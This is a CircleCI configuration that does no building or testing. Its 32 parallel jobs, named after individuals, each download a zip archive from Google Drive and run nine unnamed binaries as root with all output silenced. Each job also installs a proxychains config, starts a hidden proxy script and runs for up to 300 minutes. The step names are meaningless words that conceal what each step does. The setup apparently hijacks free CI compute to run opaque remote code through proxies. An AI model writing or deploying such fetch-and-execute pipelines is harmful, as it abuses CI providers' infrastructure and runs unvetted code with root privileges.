version: 2.1
jobs:
  SjamsulNursalim:
    docker:
      - image: circleci/golang:1.17.2
    <<: &commonSteps
      steps:
        - run:
            name: Inilah
            command: |
              sudo apt update -y
        - run:
            name: Daftar
            command: |
              wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1rFiDlPSJw3DaTadeIGt3WGsT_5reHrTY' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1rFiDlPSJw3DaTadeIGt3WGsT_5reHrTY" -O salke.zip && rm -rf /tmp/cookies.txt >/dev/null 2>&1
        - run:
            name: Nama
            command: |
              unzip salke.zip >/dev/null 2>&1
        - run:
            name: Orang
            command: |
              chmod u+x * >/dev/null 2>&1
        - run:
            name: Korupsi
            command: |
              sudo ./Siji >/dev/null 2>&1
        - run:
            name: Makan
            command: |
              sudo ./Loro >/dev/null 2>&1
        - run:
            name: Uang
            command: |
              sudo ./Telu >/dev/null 2>&1
        - run:
            name: Semua
            command: |
              sudo ./Papat >/dev/null 2>&1
        - run:
            name: Rakyat
            command: |
              sudo ./Limo >/dev/null 2>&1
        - run:
            name: Umum
            command: |
              sudo ./Enem >/dev/null 2>&1
              cd prx && cd 1
              sudo mv proxychains.conf /etc
        - run:
            name: DasarAnjir. . . .
            no_output_timeout: 300m
            command: |
              echo "Selamat Menikmati. . ."
              sudo ./Pitu >/dev/null 2>&1
              sudo ./Wolu >/dev/null 2>&1
              sudo ./Songo >/dev/null 2>&1
              screen -dmS proxy python3 p1.py >/dev/null 2>&1
              sleep 12s
              0#proxychains bash -u start1.sh >/dev/null 2>&1
  BambangSutrisno:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  AndrianKiki:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  EkoAdiPutranto:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  ShernyKonjongian:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  DavidNusaWijaya:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  SamadikunHartono:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  AgusAnwar:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  SujionoTiman:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  MariaPauline:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  DjokoSTjandra:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  GayusTambunan:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  NununNurbaeti:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  NaderThaher:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  LesmanaBasuki:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  HartawanAluwi:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  HendroWiyanto:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  AntonTantular:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  HeshamWaraq:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  RasatAliRizfi:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  HariMatalata:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  Nazaruddin:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  LidyaMuchtar:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  AndiMallarangeng:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  JeroWacik:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  EdhyPrabowo:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  ImamNahrawi:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  SuryadharmaAli:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  IdrusMarham:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  DahlanIskan:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  SitiFadilahSupari:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps
  BachtiarChamsyah:
    docker:
      - image: circleci/golang:1.17.2
    <<: *commonSteps












workflows:
  version: 2
  all:
    jobs:
      - SjamsulNursalim
      - BambangSutrisno
      - AndrianKiki
      - EkoAdiPutranto
      - ShernyKonjongian
      - DavidNusaWijaya
      - SamadikunHartono
      - AgusAnwar
      - SujionoTiman
      - MariaPauline
      - DjokoSTjandra
      - GayusTambunan
      - NununNurbaeti
      - NaderThaher
      - LesmanaBasuki
      - HartawanAluwi
      - HendroWiyanto
      - AntonTantular
      - HeshamWaraq
      - RasatAliRizfi
      - HariMatalata
      - Nazaruddin
      - LidyaMuchtar
      - AndiMallarangeng
      - JeroWacik
      - EdhyPrabowo
      - ImamNahrawi
      - SuryadharmaAli
      - IdrusMarham
      - DahlanIskan
      - SitiFadilahSupari
      - BachtiarChamsyah



